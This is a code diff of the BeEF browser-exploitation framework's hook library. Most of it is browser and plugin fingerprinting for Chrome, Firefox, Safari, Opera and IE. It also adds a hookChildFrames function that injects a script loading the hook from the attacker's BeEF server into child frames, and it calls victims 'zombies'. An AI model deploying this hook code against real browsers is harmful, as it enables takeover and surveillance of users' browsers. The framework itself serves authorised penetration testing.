- * @example: beef.browser.isFF() - */ - isFF: function() { - return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14(); - }, - - /** - * Returns true if Safari 4.xx - * @example: beef.browser.isS4() - */ - isS4: function() { - return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome); - }, - - /** - * Returns true if Safari 5.xx - * @example: beef.browser.isS5() - */ - isS5: function() { - return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome); - }, + /** + * Returns true if Safari 5.xx + * @example: beef.browser.isS5() + */ + isS5:function () { + return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window)); + }, /** * Returns true if Safari 6.xx * @example: beef.browser.isS6() */ - isS6: function() { - return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome); + isS6:function () { + return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window)); }, - - /** - * Returns true if Safari. 
- * @example: beef.browser.isS() - */ - isS: function() { - return this.isS4() || this.isS5() || this.isS6() || (!window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome); - }, - /** - * Returns true if Chrome 5. - * @example: beef.browser.isC5() - */ - isC5: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==5)?true:false); - }, - - /** - * Returns true if Chrome 6. - * @example: beef.browser.isC6() - */ - isC6: function() { - return (!!window.chrome && !!window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==6)?true:false); - }, + /** + * Returns true if Safari. + * @example: beef.browser.isS() + */ + isS:function () { + return this.isS4() || this.isS5() || this.isS6(); + }, - /** - * Returns true if Chrome 7. - * @example: beef.browser.isC7() - */ - isC7: function() { - return (!!window.chrome && !!window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==7)?true:false); - }, + /** + * Returns true if Chrome 5. + * @example: beef.browser.isC5() + */ + isC5:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 5) ? true : false); + }, - /** - * Returns true if Chrome 8. - * @example: beef.browser.isC8() - */ - isC8: function() { - return (!!window.chrome && !!window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==8)?true:false); - }, - - /** - * Returns true if Chrome 9. - * @example: beef.browser.isC9() - */ - isC9: function() { - return (!!window.chrome && !!window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==9)?true:false); - }, - - /** - * Returns true if Chrome 10. 
- * @example: beef.browser.isC10() - */ - isC10: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==10)?true:false); - }, + /** + * Returns true if Chrome 6. + * @example: beef.browser.isC6() + */ + isC6:function () { + return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 6) ? true : false); + }, - /** - * Returns true if Chrome 11. - * @example: beef.browser.isC11() - */ - isC11: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==11)?true:false); - }, - - /** - * Returns true if Chrome 12. - * @example: beef.browser.isC12() - */ - isC12: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==12)?true:false); - }, + /** + * Returns true if Chrome 7. + * @example: beef.browser.isC7() + */ + isC7:function () { + return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 7) ? true : false); + }, - /** - * Returns true if Chrome 13. - * @example: beef.browser.isC13() - */ - isC13: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==13)?true:false); - }, + /** + * Returns true if Chrome 8. + * @example: beef.browser.isC8() + */ + isC8:function () { + return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 8) ? true : false); + }, - /** - * Returns true if Chrome 14. 
- * @example: beef.browser.isC14() - */ - isC14: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==14)?true:false); - }, + /** + * Returns true if Chrome 9. + * @example: beef.browser.isC9() + */ + isC9:function () { + return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 9) ? true : false); + }, - /** - * Returns true if Chrome 15. - * @example: beef.browser.isC15() - */ - isC15: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==15)?true:false); - }, + /** + * Returns true if Chrome 10. + * @example: beef.browser.isC10() + */ + isC10:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 10) ? true : false); + }, - /** - * Returns true if Chrome 16. - * @example: beef.browser.isC16() - */ - isC16: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==16)?true:false); - }, + /** + * Returns true if Chrome 11. + * @example: beef.browser.isC11() + */ + isC11:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 11) ? true : false); + }, + + /** + * Returns true if Chrome 12. + * @example: beef.browser.isC12() + */ + isC12:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 12) ? 
true : false); + }, + + /** + * Returns true if Chrome 13. + * @example: beef.browser.isC13() + */ + isC13:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 13) ? true : false); + }, + + /** + * Returns true if Chrome 14. + * @example: beef.browser.isC14() + */ + isC14:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 14) ? true : false); + }, + + /** + * Returns true if Chrome 15. + * @example: beef.browser.isC15() + */ + isC15:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 15) ? true : false); + }, + + /** + * Returns true if Chrome 16. + * @example: beef.browser.isC16() + */ + isC16:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 16) ? true : false); + }, /** * Returns true if Chrome 17. * @example: beef.browser.isC17() */ - isC17: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false); + isC17:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 17) ? true : false); }, - /** - * Returns true if Chrome 18. 
- * @example: beef.browser.isC18() - */ - isC18: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==18)?true:false); - }, + /** + * Returns true if Chrome 18. + * @example: beef.browser.isC18() + */ + isC18:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 18) ? true : false); + }, - /** - * Returns true if Chrome 19. - * @example: beef.browser.isC19() - */ - isC19: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==19)?true:false); - }, + /** + * Returns true if Chrome 19. + * @example: beef.browser.isC19() + */ + isC19:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false); + }, - /** - * Returns true if Chrome 20. - * @example: beef.browser.isC20() - */ - isC20: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==20)?true:false); - }, + /** + * Returns true if Chrome for iOS 19. + * @example: beef.browser.isC19iOS() + */ + isC19iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false); + }, + + /** + * Returns true if Chrome 20. + * @example: beef.browser.isC20() + */ + isC20:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? 
true : false); + }, + + /** + * Returns true if Chrome for iOS 20. + * @example: beef.browser.isC20iOS() + */ + isC20iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false); + }, /** * Returns true if Chrome 21. * @example: beef.browser.isC21() */ - isC21: function() { - return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==21)?true:false); + isC21:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 21. + * @example: beef.browser.isC21iOS() + */ + isC21iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false); + }, + + /** + * Returns true if Chrome 22. + * @example: beef.browser.isC22() + */ + isC22:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 22. + * @example: beef.browser.isC22iOS() + */ + isC22iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false); + }, + + /** + * Returns true if Chrome 23. 
+ * @example: beef.browser.isC23() + */ + isC23:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 23. + * @example: beef.browser.isC23iOS() + */ + isC23iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false); + }, + + /** + * Returns true if Chrome 24. + * @example: beef.browser.isC24() + */ + isC24:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 24. + * @example: beef.browser.isC24iOS() + */ + isC24iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false); + }, + + /** + * Returns true if Chrome 25. + * @example: beef.browser.isC25() + */ + isC25:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 25. + * @example: beef.browser.isC25iOS() + */ + isC25iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false); + }, + + /** + * Returns true if Chrome 26. 
+ * @example: beef.browser.isC26() + */ + isC26:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 26. + * @example: beef.browser.isC26iOS() + */ + isC26iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false); + }, + + /** + * Returns true if Chrome 27. + * @example: beef.browser.isC27() + */ + isC27:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 27. + * @example: beef.browser.isC27iOS() + */ + isC27iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false); + }, + + /** + * Returns true if Chrome 28. + * @example: beef.browser.isC28() + */ + isC28:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 28. + * @example: beef.browser.isC28iOS() + */ + isC28iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false); + }, + + /** + * Returns true if Chrome 29. 
+ * @example: beef.browser.isC29() + */ + isC29:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 29) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 29. + * @example: beef.browser.isC29iOS() + */ + isC29iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 29) ? true : false); + }, + + /** + * Returns true if Chrome 30. + * @example: beef.browser.isC30() + */ + isC30:function () { + return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 30) ? true : false); + }, + + /** + * Returns true if Chrome for iOS 30. + * @example: beef.browser.isC30iOS() + */ + isC30iOS:function () { + return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 30) ? true : false); + }, + + /** + * Returns true if Chrome. 
+ * @example: beef.browser.isC() + */ + isC:function () { + return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS(); + }, + + /** + * Returns true if Opera 9.50 through 9.52. + * @example: beef.browser.isO9_52() + */ + isO9_52:function () { + return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.5/) != null)); + }, + + /** + * Returns true if Opera 9.60 through 9.64. + * @example: beef.browser.isO9_60() + */ + isO9_60:function () { + return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.6/) != null)); + }, + + /** + * Returns true if Opera 10.xx. + * @example: beef.browser.isO10() + */ + isO10:function () { + return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/10\./) != null)); + }, + + /** + * Returns true if Opera 11.xx. + * @example: beef.browser.isO11() + */ + isO11:function () { + return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/11\./) != null)); + }, + + /** + * Returns true if Opera 12.xx. + * @example: beef.browser.isO12() + */ + isO12:function () { + return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null)); + }, + + /** + * Returns true if Opera. 
+ * @example: beef.browser.isO() + */ + isO:function () { + return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12(); + }, + + /** + * Returns the type of browser being used. + * @example: beef.browser.type().IE6 + * @example: beef.browser.type().FF + * @example: beef.browser.type().O + */ + type:function () { + + return { + C5:this.isC5(), // Chrome 5 + C6:this.isC6(), // Chrome 6 + C7:this.isC7(), // Chrome 7 + C8:this.isC8(), // Chrome 8 + C9:this.isC9(), // Chrome 9 + C10:this.isC10(), // Chrome 10 + C11:this.isC11(), // Chrome 11 + C12:this.isC12(), // Chrome 12 + C13:this.isC13(), // Chrome 13 + C14:this.isC14(), // Chrome 14 + C15:this.isC15(), // Chrome 15 + C16:this.isC16(), // Chrome 16 + C17:this.isC17(), // Chrome 17 + C18:this.isC18(), // Chrome 18 + C19:this.isC19(), // Chrome 19 + C19iOS:this.isC19iOS(), // Chrome 19 on iOS + C20:this.isC20(), // Chrome 20 + C20iOS:this.isC20iOS(), // Chrome 20 on iOS + C21:this.isC21(), // Chrome 21 + C21iOS:this.isC21iOS(), // Chrome 21 on iOS + C22:this.isC22(), // Chrome 22 + C22iOS:this.isC22iOS(), // Chrome 22 on iOS + C23:this.isC23(), // Chrome 23 + C23iOS:this.isC23iOS(), // Chrome 23 on iOS + C24:this.isC24(), // Chrome 24 + C24iOS:this.isC24iOS(), // Chrome 24 on iOS + C25:this.isC25(), // Chrome 25 + C25iOS:this.isC25iOS(), // Chrome 25 on iOS + C26:this.isC26(), // Chrome 26 + C26iOS:this.isC26iOS(), // Chrome 26 on iOS + C27:this.isC27(), // Chrome 27 + C27iOS:this.isC27iOS(), // Chrome 27 on iOS + C28:this.isC28(), // Chrome 28 + C28iOS:this.isC28iOS(), // Chrome 28 on iOS + C29:this.isC29(), // Chrome 29 + C29iOS:this.isC29iOS(), // Chrome 29 on iOS + C30:this.isC30(), // Chrome 30 + C30iOS:this.isC30iOS(), // Chrome 30 on iOS + C:this.isC(), // Chrome any version + + FF2:this.isFF2(), // Firefox 2 + FF3:this.isFF3(), // Firefox 3 + FF3_5:this.isFF3_5(), // Firefox 3.5 + FF3_6:this.isFF3_6(), // Firefox 3.6 + FF4:this.isFF4(), // Firefox 4 + FF5:this.isFF5(), // Firefox 
5 + FF6:this.isFF6(), // Firefox 6 + FF7:this.isFF7(), // Firefox 7 + FF8:this.isFF8(), // Firefox 8 + FF9:this.isFF9(), // Firefox 9 + FF10:this.isFF10(), // Firefox 10 + FF11:this.isFF11(), // Firefox 11 + FF12:this.isFF12(), // Firefox 12 + FF13:this.isFF13(), // Firefox 13 + FF14:this.isFF14(), // Firefox 14 + FF15:this.isFF15(), // Firefox 15 + FF16:this.isFF16(), // Firefox 16 + FF17:this.isFF17(), // Firefox 17 + FF18:this.isFF18(), // Firefox 18 + FF19:this.isFF19(), // Firefox 19 + FF20:this.isFF20(), // Firefox 20 + FF21:this.isFF21(), // Firefox 21 + FF22:this.isFF22(), // Firefox 22 + FF23:this.isFF23(), // Firefox 23 + FF24:this.isFF24(), // Firefox 24 + FF25:this.isFF25(), // Firefox 25 + FF:this.isFF(), // Firefox any version + + IE6:this.isIE6(), // Internet Explorer 6 + IE7:this.isIE7(), // Internet Explorer 7 + IE8:this.isIE8(), // Internet Explorer 8 + IE9:this.isIE9(), // Internet Explorer 9 + IE10:this.isIE10(), // Internet Explorer 10 + IE:this.isIE(), // Internet Explorer any version + + O9_52:this.isO9_52(), // Opera 9.50 through 9.52 + O9_60:this.isO9_60(), // Opera 9.60 through 9.64 + O10:this.isO10(), // Opera 10.xx + O11:this.isO11(), // Opera 11.xx + O12:this.isO12(), // Opera 11.xx + O:this.isO(), // Opera any version + + S4:this.isS4(), // Safari 4.xx + S5:this.isS5(), // Safari 5.xx + S6:this.isS6(), // Safari 6.x + S:this.isS() // Safari any version + } + }, + + /** + * Returns the type of browser being used. + * @return: {String} User agent software and version. 
+ * + * @example: beef.browser.getBrowserVersion() + */ + getBrowserVersion:function () { + + if (this.isC5()) { + return '5' + } + ; // Chrome 5 + if (this.isC6()) { + return '6' + } + ; // Chrome 6 + if (this.isC7()) { + return '7' + } + ; // Chrome 7 + if (this.isC8()) { + return '8' + } + ; // Chrome 8 + if (this.isC9()) { + return '9' + } + ; // Chrome 9 + if (this.isC10()) { + return '10' + } + ; // Chrome 10 + if (this.isC11()) { + return '11' + } + ; // Chrome 11 + if (this.isC12()) { + return '12' + } + ; // Chrome 12 + if (this.isC13()) { + return '13' + } + ; // Chrome 13 + if (this.isC14()) { + return '14' + } + ; // Chrome 14 + if (this.isC15()) { + return '15' + } + ; // Chrome 15 + if (this.isC16()) { + return '16' + } + ; // Chrome 16 + if (this.isC17()) { + return '17' + } + ; // Chrome 17 + if (this.isC18()) { + return '18' + } + ; // Chrome 18 + if (this.isC19()) { + return '19' + } + ; // Chrome 19 + if (this.isC19iOS()) { + return '19' + } + ; // Chrome 19 for iOS + if (this.isC20()) { + return '20' + } + ; // Chrome 20 + if (this.isC20iOS()) { + return '20' + } + ; // Chrome 20 for iOS + if (this.isC21()) { + return '21' + } + ; // Chrome 21 + if (this.isC21iOS()) { + return '21' + } + ; // Chrome 21 for iOS + if (this.isC22()) { + return '22' + } + ; // Chrome 22 + if (this.isC22iOS()) { + return '22' + } + ; // Chrome 22 for iOS + if (this.isC23()) { + return '23' + } + ; // Chrome 23 + if (this.isC23iOS()) { + return '23' + } + ; // Chrome 23 for iOS + if (this.isC24()) { + return '24' + } + ; // Chrome 24 + if (this.isC24iOS()) { + return '24' + } + ; // Chrome 24 for iOS + if (this.isC25()) { + return '25' + } + ; // Chrome 25 + if (this.isC25iOS()) { + return '25' + } + ; // Chrome 25 for iOS + if (this.isC26()) { + return '26' + } + ; // Chrome 26 + if (this.isC26iOS()) { + return '26' + } + ; // Chrome 26 for iOS + if (this.isC27()) { + return '27' + } + ; // Chrome 27 + if (this.isC27iOS()) { + return '27' + } + ; // Chrome 27 for iOS 
+ if (this.isC28()) { + return '28' + } + ; // Chrome 28 + if (this.isC28iOS()) { + return '28' + } + ; // Chrome 28 for iOS + if (this.isC29()) { + return '29' + } + ; // Chrome 29 + if (this.isC29iOS()) { + return '29' + } + ; // Chrome 29 for iOS + if (this.isC30()) { + return '30' + } + ; // Chrome 30 + if (this.isC30iOS()) { + return '30' + } + ; // Chrome 30 for iOS + if (this.isFF2()) { + return '2' + } + ; // Firefox 2 + if (this.isFF3()) { + return '3' + } + ; // Firefox 3 + if (this.isFF3_5()) { + return '3.5' + } + ; // Firefox 3.5 + if (this.isFF3_6()) { + return '3.6' + } + ; // Firefox 3.6 + if (this.isFF4()) { + return '4' + } + ; // Firefox 4 + if (this.isFF5()) { + return '5' + } + ; // Firefox 5 + if (this.isFF6()) { + return '6' + } + ; // Firefox 6 + if (this.isFF7()) { + return '7' + } + ; // Firefox 7 + if (this.isFF8()) { + return '8' + } + ; // Firefox 8 + if (this.isFF9()) { + return '9' + } + ; // Firefox 9 + if (this.isFF10()) { + return '10' + } + ; // Firefox 10 + if (this.isFF11()) { + return '11' + } + ; // Firefox 11 + if (this.isFF12()) { + return '12' + } + ; // Firefox 12 + if (this.isFF13()) { + return '13' + } + ; // Firefox 13 + if (this.isFF14()) { + return '14' + } + ; // Firefox 14 + if (this.isFF15()) { + return '15' + } + ; // Firefox 15 + if (this.isFF16()) { + return '16' + } + ; // Firefox 16 + if (this.isFF17()) { + return '17' + } + ; // Firefox 17 + if (this.isFF18()) { + return '18' + } + ; // Firefox 18 + if (this.isFF19()) { + return '19' + } + ; // Firefox 19 + if (this.isFF20()) { + return '20' + } + ; // Firefox 20 + if (this.isFF21()) { + return '21' + } + ; // Firefox 21 + if (this.isFF22()) { + return '22' + } + ; // Firefox 22 + if (this.isFF23()) { + return '23' + } + ; // Firefox 23 + if (this.isFF24()) { + return '24' + } + ; // Firefox 24 + if (this.isFF25()) { + return '25' + } + ; // Firefox 25 + + if (this.isIE6()) { + return '6' + } + ; // Internet Explorer 6 + if (this.isIE7()) { + return '7' + } + 
; // Internet Explorer 7 + if (this.isIE8()) { + return '8' + } + ; // Internet Explorer 8 + if (this.isIE9()) { + return '9' + } + ; // Internet Explorer 9 + if (this.isIE10()) { + return '10' + } + ; // Internet Explorer 10 + + if (this.isS4()) { + return '4' + } + ; // Safari 4 + if (this.isS5()) { + return '5' + } + ; // Safari 5 + if (this.isS6()) { + return '6' + } + ; // Safari 6 + + if (this.isO9_52()) { + return '9.5' + } + ; // Opera 9.5x + if (this.isO9_60()) { + return '9.6' + } + ; // Opera 9.6 + if (this.isO10()) { + return '10' + } + ; // Opera 10.xx + if (this.isO11()) { + return '11' + } + ; // Opera 11.xx + if (this.isO12()) { + return '12' + } + ; // Opera 12.xx + + return 'UNKNOWN'; // Unknown UA + }, + + /** + * Returns the type of user agent by hooked browser. + * @return: {String} User agent software. + * + * @example: beef.browser.getBrowserName() + */ + getBrowserName:function () { + + if (this.isC()) { + return 'C' + } + ; // Chrome any version + if (this.isFF()) { + return 'FF' + } + ; // Firefox any version + if (this.isIE()) { + return 'IE' + } + ; // Internet Explorer any version + if (this.isO()) { + return 'O' + } + ; // Opera any version + if (this.isS()) { + return 'S' + } + ; // Safari any version + return 'UNKNOWN'; // Unknown UA + }, + + /** + * Hooks all child frames in the current window + * Restricted by same-origin policy + */ + hookChildFrames:function () { + + // create script object + var script = document.createElement('script'); + script.type = 'text/javascript'; + script.src = '<%== @beef_proto %>://<%== @beef_host %>:<%== @beef_port %><%== @hook_file %>'; + + // loop through child frames + for (var i=0;i= 0) { + quicktime = true; + } + + } + + // Internet Explorer + } else { + + try { + + var qt_test = new ActiveXObject('QuickTime.QuickTime'); + + } catch (e) { + beef.debug("Creating QuickTime ActiveX object failed: "+e.message); + } + + if (qt_test) { + quicktime = true; + } + + } + + return quicktime; + + }, + + /** 
+ * Checks if the zombie has the RealPlayer plugin installed. + * @return: {Boolean} true or false. + * + * @example: if ( beef.browser.hasRealPlayer() ) { ... } + */ + hasRealPlayer:function () { + + var realplayer = false; + + // Not Internet Explorer + if (!this.type().IE) { + + for (i = 0; i < navigator.plugins.length; i++) { + + if (navigator.plugins[i].name.indexOf("RealPlayer") >= 0) { + realplayer = true; + } + + } + + // Internet Explorer + } else { + + var definedControls = [ + 'RealPlayer', + 'rmocx.RealPlayer G2 Control', + 'rmocx.RealPlayer G2 Control.1', + 'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)', + 'RealVideo.RealVideo(tm) ActiveX Control (32-bit)' + ]; + + for (var i = 0; i < definedControls.length; i++) { + + try { + var rp_test = new ActiveXObject(definedControls[i]); + } catch (e) { + beef.debug("Creating RealPlayer ActiveX object failed: "+e.message); + } + + if ( rp_test ) { + realplayer = true; + + } + } + } + + return realplayer; + }, /** - * Returns true if Chrome. - * @example: beef.browser.isC() - */ - isC: function() { - return this.isC5() || 